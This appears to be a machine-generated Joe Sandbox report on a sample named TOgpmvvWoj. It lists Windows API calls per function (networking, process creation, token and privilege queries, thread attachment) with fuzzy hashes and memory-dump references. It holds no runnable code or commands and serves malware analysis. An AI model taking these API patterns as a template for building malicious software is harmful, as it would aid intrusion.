                                            • Instruction ID: 209ad22d1e1ec3fc4215ec155d79240d4705e04d935a18fc01fffc5d1a558a66
                                            • Opcode Fuzzy Hash: cf4f193fe0a044646a43f2b0bd24c7050603a6d8eca0459bb05b6584a033a4f1
                                            • Instruction Fuzzy Hash: BE319175600018AFCF29DF59DC98EEA7BF6EB49314F14406AF905AB261C731AD50DFA0
                                            APIs
                                            • __setmode.LIBCMT ref: 00E30BF2
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E77B20,?,?,00000000), ref: 00E15B8C
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E77B20,?,?,00000000,?,?), ref: 00E15BB0
                                            • _fprintf.LIBCMT ref: 00E30C29
                                            • OutputDebugStringW.KERNEL32(?), ref: 00E66331
                                              • Part of subcall function 00E34CDA: _flsall.LIBCMT ref: 00E34CF3
                                            • __setmode.LIBCMT ref: 00E30C5E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                            • String ID:
                                            • API String ID: 521402451-0
                                            • Opcode ID: 3d3bd075f033ec540ef87e66b361748069f039370422c67800c747fde06f207b
                                            • Instruction ID: 597f8241c735efd8da83a1cdbae670549d2ba171335a7c1d4bc1e447bae056fa
                                            • Opcode Fuzzy Hash: 3d3bd075f033ec540ef87e66b361748069f039370422c67800c747fde06f207b
                                            • Instruction Fuzzy Hash: 87112772944208AECB04B7B4AC4A9FEBFE99F85320F14615AF104772D2DE202D85C391
                                            APIs
                                              • Part of subcall function 00E68652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E68669
                                              • Part of subcall function 00E68652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E68673
                                              • Part of subcall function 00E68652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E68682
                                              • Part of subcall function 00E68652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E68689
                                              • Part of subcall function 00E68652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E6869F
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E68BEB
                                            • _memcmp.LIBCMT ref: 00E68C0E
                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E68C44
                                            • HeapFree.KERNEL32(00000000), ref: 00E68C4B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                            • String ID:
                                            • API String ID: 1592001646-0
                                            • Opcode ID: 41e4e4b4b7112891ee00fa0e2dd0935d25ce22e55faee22b8be4885ef885946f
                                            • Instruction ID: 1d9601b43840d1963d8320526f7fb5f8b8ffa35a676746d8cbcd9c5fb15b7691
                                            • Opcode Fuzzy Hash: 41e4e4b4b7112891ee00fa0e2dd0935d25ce22e55faee22b8be4885ef885946f
                                            • Instruction Fuzzy Hash: 7B219C71E81208EFCB00CFA5DA49BEEF7B8EF54384F14415AE454B7241DB31AA06CB61
                                            APIs
                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E81A97
                                              • Part of subcall function 00E81B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E81B40
                                              • Part of subcall function 00E81B21: InternetCloseHandle.WININET(00000000), ref: 00E81BDD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Internet$CloseConnectHandleOpen
                                            • String ID:
                                            • API String ID: 1463438336-0
                                            • Opcode ID: f3aae3a2595a959e27fa096bff53089bb8e5f18b2a71ecb8a3d01464a52e7f79
                                            • Instruction ID: 4c8baaf3a38e705bfbe641b00d5fd299663ad66f76e175f0261ce739e8367096
                                            • Opcode Fuzzy Hash: f3aae3a2595a959e27fa096bff53089bb8e5f18b2a71ecb8a3d01464a52e7f79
                                            • Instruction Fuzzy Hash: 3D218E35201601BFDB16AF61CC01FBAB7ADFF44701F10105BFA5EA6650EB71D8169BA0
                                            APIs
                                              • Part of subcall function 00E6F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E6E1C4,?,?,?,00E6EFB7,00000000,000000EF,00000119,?,?), ref: 00E6F5BC
                                              • Part of subcall function 00E6F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00E6F5E2
                                              • Part of subcall function 00E6F5AD: lstrcmpiW.KERNEL32(00000000,?,00E6E1C4,?,?,?,00E6EFB7,00000000,000000EF,00000119,?,?), ref: 00E6F613
                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E6EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E6E1DD
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00E6E203
                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E6EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E6E237
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: lstrcmpilstrcpylstrlen
                                            • String ID: cdecl
                                            • API String ID: 4031866154-3896280584
                                            • Opcode ID: f4d9a0449a797880b3adca41989e000bf108fd07f637a40bc80ff77766ac63fb
                                            • Instruction ID: a3f329fba21812991f436ede053392faee4ecfa70696c839dff4c5dc1c5a51d9
                                            • Opcode Fuzzy Hash: f4d9a0449a797880b3adca41989e000bf108fd07f637a40bc80ff77766ac63fb
                                            • Instruction Fuzzy Hash: FC11D33A200301EFCB25AF65EC49D7A77A9FF44390B40502AF806DB2A4EB719C51D790
                                            APIs
                                            • _free.LIBCMT ref: 00E45351
                                              • Part of subcall function 00E3594C: __FF_MSGBANNER.LIBCMT ref: 00E35963
                                              • Part of subcall function 00E3594C: __NMSG_WRITE.LIBCMT ref: 00E3596A
                                              • Part of subcall function 00E3594C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,?,?,?,00E31013,?), ref: 00E3598F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AllocateHeap_free
                                            • String ID:
                                            • API String ID: 614378929-0
                                            • Opcode ID: 8bffb3e52b09e8d3a4221548bdb67ff09866999988f2b2b645b0f32225451148
                                            • Instruction ID: 89b4e9ec0f983b67d40a89605dc2bfa0573e8f31aa943f2e63f1fd8132df2965
                                            • Opcode Fuzzy Hash: 8bffb3e52b09e8d3a4221548bdb67ff09866999988f2b2b645b0f32225451148
                                            • Instruction Fuzzy Hash: 9811E033504B15AFCB312F70BC086AE3BD8AF103A4F60242BF944BA1A2DEB58D40C790
                                            APIs
                                            • _memset.LIBCMT ref: 00E14560
                                              • Part of subcall function 00E1410D: _memset.LIBCMT ref: 00E1418D
                                              • Part of subcall function 00E1410D: _wcscpy.LIBCMT ref: 00E141E1
                                              • Part of subcall function 00E1410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E141F1
                                            • KillTimer.USER32(?,00000001,?,?), ref: 00E145B5
                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E145C4
                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E4D6CE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                            • String ID:
                                            • API String ID: 1378193009-0
                                            • Opcode ID: ba20812bb10388a2d6268015e28d1d09fec7a1e9e93bff57ef8f4aa104b9440c
                                            • Instruction ID: 8218a46e22452a00d8eafe49bb6253af6cae3dbe8e5fc29eb8474aae9f8cbccd
                                            • Opcode Fuzzy Hash: ba20812bb10388a2d6268015e28d1d09fec7a1e9e93bff57ef8f4aa104b9440c
                                            • Instruction Fuzzy Hash: 4821DAB0908784AFE7328B24DC45BE7BBED9F01308F04109FE69DB6281C7745A88CB51
                                            APIs
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E77B20,?,?,00000000), ref: 00E15B8C
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E77B20,?,?,00000000,?,?), ref: 00E15BB0
                                            • gethostbyname.WSOCK32(?,?,?), ref: 00E866AC
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E866B7
                                            • _memmove.LIBCMT ref: 00E866E4
                                            • inet_ntoa.WSOCK32(?), ref: 00E866EF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                            • String ID:
                                            • API String ID: 1504782959-0
                                            • Opcode ID: 342de1a3eaf51b0cd1e2536239661cc2572181a7b8b6e84cc3201a5ce077fd30
                                            • Instruction ID: 5e884ca5aa40c3153ba5bf3a1ebdf7b896ef72724757e02491a538d31d58320f
                                            • Opcode Fuzzy Hash: 342de1a3eaf51b0cd1e2536239661cc2572181a7b8b6e84cc3201a5ce077fd30
                                            • Instruction Fuzzy Hash: 28115E76500508AFCB04FBA4DD96DEEB7F9AF44310B145066F50AB7162DF30AE44CBA1
                                            APIs
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00E69043
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E69055
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E6906B
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E69086
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 1f14572b532d84d274edfb486b1bb0b0e99aacc3eaa0f93ce140a56adb957d8e
                                            • Instruction ID: 52b0070f41a5f9692d864abd273ea6dfd62cda57caebb71404f8ce5968a717e8
                                            • Opcode Fuzzy Hash: 1f14572b532d84d274edfb486b1bb0b0e99aacc3eaa0f93ce140a56adb957d8e
                                            • Instruction Fuzzy Hash: 32115E79940218FFDB10DFA5CD84EDDBBB8FB48350F204095E904B7291D6716E10DB90
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • DefDlgProcW.USER32(?,00000020,?), ref: 00E112D8
                                            • GetClientRect.USER32(?,?), ref: 00E4B84B
                                            • GetCursorPos.USER32(?), ref: 00E4B855
                                            • ScreenToClient.USER32(?,?), ref: 00E4B860
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Client$CursorLongProcRectScreenWindow
                                            • String ID:
                                            • API String ID: 4127811313-0
                                            • Opcode ID: 9058c5e5a1d65d0d0ad1772fbfde205f7dabd3e841afee8d68198921a448377f
                                            • Instruction ID: 661d06496b33af2a762b3c74605390e4ec9a0dc4fa20993b9ad9b93c263acaff
                                            • Opcode Fuzzy Hash: 9058c5e5a1d65d0d0ad1772fbfde205f7dabd3e841afee8d68198921a448377f
                                            • Instruction Fuzzy Hash: 8A116A35900119AFCF10DF98D8859FE77B8EB05300F500496FA01F7261C734BA95EBA5
                                            APIs
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E701FD,?,00E71250,?,00008000), ref: 00E7166F
                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E701FD,?,00E71250,?,00008000), ref: 00E71694
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E701FD,?,00E71250,?,00008000), ref: 00E7169E
                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00E701FD,?,00E71250,?,00008000), ref: 00E716D1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CounterPerformanceQuerySleep
                                            • String ID:
                                            • API String ID: 2875609808-0
                                            • Opcode ID: 028337237cdccbc19d15a11dba482b69ce521f0906f47f2c4bfea425c0e40aed
                                            • Instruction ID: 4486856fade75095523a8e15b1dee4b9b48b5ea3aa3a1cb21f8d0ba80ab8d820
                                            • Opcode Fuzzy Hash: 028337237cdccbc19d15a11dba482b69ce521f0906f47f2c4bfea425c0e40aed
                                            • Instruction Fuzzy Hash: 0C113C31C0161DDBCF04AFEAD949AEEBB78FF09751F05909AE988B6240CB3055648BD6
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction ID: 920a27821921aa3891e3912e7f3b474273c845253afd2c06a0a1b748c6f04a9b
                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction Fuzzy Hash: 6601807244414ABBCF125E84EC018EE3F62BF59345B499615FA9868031D377C9B1AB85
                                            APIs
                                            • GetWindowRect.USER32(?,?), ref: 00E9B59E
                                            • ScreenToClient.USER32(?,?), ref: 00E9B5B6
                                            • ScreenToClient.USER32(?,?), ref: 00E9B5DA
                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E9B5F5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClientRectScreen$InvalidateWindow
                                            • String ID:
                                            • API String ID: 357397906-0
                                            • Opcode ID: 0753f015acbdad7428cd24aee696d419d172f93df856f70aff1779cc6cb1462d
                                            • Instruction ID: 72111a9fd32434ae4e39c69031911d9e73cffad883137e424fc69efa35704bfc
                                            • Opcode Fuzzy Hash: 0753f015acbdad7428cd24aee696d419d172f93df856f70aff1779cc6cb1462d
                                            • Instruction Fuzzy Hash: 7C1146B5D00209EFDB41CF99D544AEEFBB5FB08310F104166E915E3220D735AA558F91
                                            APIs
                                            • _memset.LIBCMT ref: 00E9B8FE
                                            • _memset.LIBCMT ref: 00E9B90D
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00ED7F20,00ED7F64), ref: 00E9B93C
                                            • CloseHandle.KERNEL32 ref: 00E9B94E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memset$CloseCreateHandleProcess
                                            • String ID:
                                            • API String ID: 3277943733-0
                                            • Opcode ID: 69fccaa0f4233d47ddf915f3bf86cf0cff448212f83c26173bbc5ccada4b4cf1
                                            • Instruction ID: 7e6364cda6b333044b5e74e2302678764000279f4d57d984a2aa9e33b0915c24
                                            • Opcode Fuzzy Hash: 69fccaa0f4233d47ddf915f3bf86cf0cff448212f83c26173bbc5ccada4b4cf1
                                            • Instruction Fuzzy Hash: 10F030B16493007EE2206772AC06F7B3B9CEB08354F401022BA48F5291E775490487A8
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?), ref: 00E76E88
                                              • Part of subcall function 00E7794E: _memset.LIBCMT ref: 00E77983
                                            • _memmove.LIBCMT ref: 00E76EAB
                                            • _memset.LIBCMT ref: 00E76EB8
                                            • LeaveCriticalSection.KERNEL32(?), ref: 00E76EC8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                            • String ID:
                                            • API String ID: 48991266-0
                                            • Opcode ID: 2021883ee53ae5eac39cfc2967c3170e98b8cbdaabd074aaa96cd82f3670131e
                                            • Instruction ID: fa17b53d722fb35075c840102ff4c2f90244331e3624540cdf83ec4387146c5e
                                            • Opcode Fuzzy Hash: 2021883ee53ae5eac39cfc2967c3170e98b8cbdaabd074aaa96cd82f3670131e
                                            • Instruction Fuzzy Hash: 06F0543A100200ABCF016F55DC85F4ABB69EF85320F04C066FE0CAE226C731E951CBB4
                                            APIs
                                              • Part of subcall function 00E112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E1134D
                                              • Part of subcall function 00E112F3: SelectObject.GDI32(?,00000000), ref: 00E1135C
                                              • Part of subcall function 00E112F3: BeginPath.GDI32(?), ref: 00E11373
                                              • Part of subcall function 00E112F3: SelectObject.GDI32(?,00000000), ref: 00E1139C
                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E9C030
                                            • LineTo.GDI32(00000000,?,?), ref: 00E9C03D
                                            • EndPath.GDI32(00000000), ref: 00E9C04D
                                            • StrokePath.GDI32(00000000), ref: 00E9C05B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                            • String ID:
                                            • API String ID: 1539411459-0
                                            • Opcode ID: 40da4973f2ee7fe722054d9912ba617d3fd1891b0920cfdf3db11159e2c3edb1
                                            • Instruction ID: 1d3647fd70c36e36ef7ee2867f35cec8e968b90ff7e3c374a1d48f583b7f4c8d
                                            • Opcode Fuzzy Hash: 40da4973f2ee7fe722054d9912ba617d3fd1891b0920cfdf3db11159e2c3edb1
                                            • Instruction Fuzzy Hash: 76F05E35005259BFDB126F96AC0AFCE3F99AF06311F144102FA11B10E2C7755669DBD5
                                            APIs
                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E6A399
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E6A3AC
                                            • GetCurrentThreadId.KERNEL32 ref: 00E6A3B3
                                            • AttachThreadInput.USER32(00000000), ref: 00E6A3BA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                            • String ID:
                                            • API String ID: 2710830443-0
